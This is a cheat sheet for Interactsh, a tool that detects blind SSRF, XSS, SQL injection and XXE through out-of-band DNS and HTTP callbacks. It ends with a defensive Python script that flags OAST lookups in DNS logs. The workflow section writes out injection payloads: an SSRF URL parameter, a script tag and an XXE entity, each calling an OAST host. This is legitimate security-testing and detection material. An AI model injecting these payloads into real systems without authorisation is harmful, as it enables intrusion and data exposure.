Description
Interactsh is an open-source tool for detecting out-of-band (OOB) interactions. It confirms blind vulnerabilities such as SSRF, blind XSS, blind SQL injection, and XXE by handing out unique interaction URLs and logging the DNS, HTTP, and SMTP callbacks those URLs receive.
Installation
BASH
# Using Go
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
# Homebrew
brew install interactsh
# Self-hosted server
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
Basic Usage
BASH
# Generate unique OOB URLs
interactsh-client
# The tool outputs a unique URL like:
# [INF] Listing 1 payload for OOB Testing
# [INF] abc123.oast.fun
# Use this URL in your payloads to detect blind vulnerabilities
Advanced Usage
BASH
# Custom token count
interactsh-client -n 5
# Connect to a specific server (pass its auth token if the server is protected)
interactsh-client -s interactsh.com -token YOUR_TOKEN
# Filter by protocol
interactsh-client -dns-only
interactsh-client -http-only
# JSON output
interactsh-client -json
# Self-hosted server
interactsh-server -domain oast.yourdomain.com -ip YOUR_IP
Common Workflows
BASH
# Blind SSRF testing
# 1. Generate URL with interactsh-client
# 2. Inject into URL parameters: https://target.com/fetch?url=http://abc123.oast.fun
# 3. Watch interactsh-client for DNS/HTTP callbacks
# Blind XSS
# Inject: <script src="http://abc123.oast.fun/x"></script>
# Blind XXE
# Inject: <!ENTITY xxe SYSTEM "http://abc123.oast.fun/xxe">
# With Nuclei
nuclei -u https://target.com -iserver interactsh.com
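The same callbacks the client reports are visible to defenders in their own resolver logs. As an added example (not part of the original cheat sheet or of Interactsh), this script scans constructed dnsmasq-style query lines for lookups of the OAST domains used above, groups them by internal source host, and extracts the unique-id label; the log format and the self-hosted domain `oast.yourdomain.com` are assumptions.

```python
import re
from collections import defaultdict

# Default Interactsh domains that appear in the cheat sheet, plus the
# placeholder self-hosted domain (assumption: replace with your own).
OAST_DOMAINS = ("oast.fun", "interactsh.com", "oast.yourdomain.com")

# Constructed dnsmasq-style query log (not real traffic).
SAMPLE_DNS_LOG = """\
Mar 10 12:00:01 dnsmasq[812]: query[A] www.example.org from 10.0.0.12
Mar 10 12:00:03 dnsmasq[812]: query[A] abc123.oast.fun from 10.0.0.23
Mar 10 12:00:03 dnsmasq[812]: query[AAAA] abc123.oast.fun from 10.0.0.23
Mar 10 12:00:09 dnsmasq[812]: query[A] cdn.example.net from 10.0.0.12
Mar 10 12:00:15 dnsmasq[812]: query[A] c9f2k1.interactsh.com from 10.0.0.45
Mar 10 12:00:20 dnsmasq[812]: query[A] notoast.fun from 10.0.0.12
"""

QUERY_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<src>\S+)")


def oast_match(name):
    """Return the OAST base domain if `name` is that domain or a subdomain of it.

    Uses a label-boundary check so that e.g. notoast.fun does not match oast.fun.
    """
    name = name.lower().rstrip(".")
    for base in OAST_DOMAINS:
        if name == base or name.endswith("." + base):
            return base
    return None


def find_oast_lookups(log_text):
    """Map source IP -> list of (qtype, fqdn, oast_base, unique_id_label)."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        base = oast_match(m["name"])
        if base is None:
            continue
        fqdn = m["name"].lower().rstrip(".")
        label = fqdn[: -len(base)].rstrip(".")  # the unique-id part, e.g. abc123
        hits[m["src"]].append((m["qtype"], fqdn, base, label))
    return dict(hits)


if __name__ == "__main__":
    for src, lookups in find_oast_lookups(SAMPLE_DNS_LOG).items():
        print(f"{src}: {len(lookups)} OAST lookup(s) -> {sorted({l[3] for l in lookups})}")
```

Each flagged source host is a candidate for review: a single OAST label seen from an internal server usually means a payload landed in that host's input and the host fetched or resolved it.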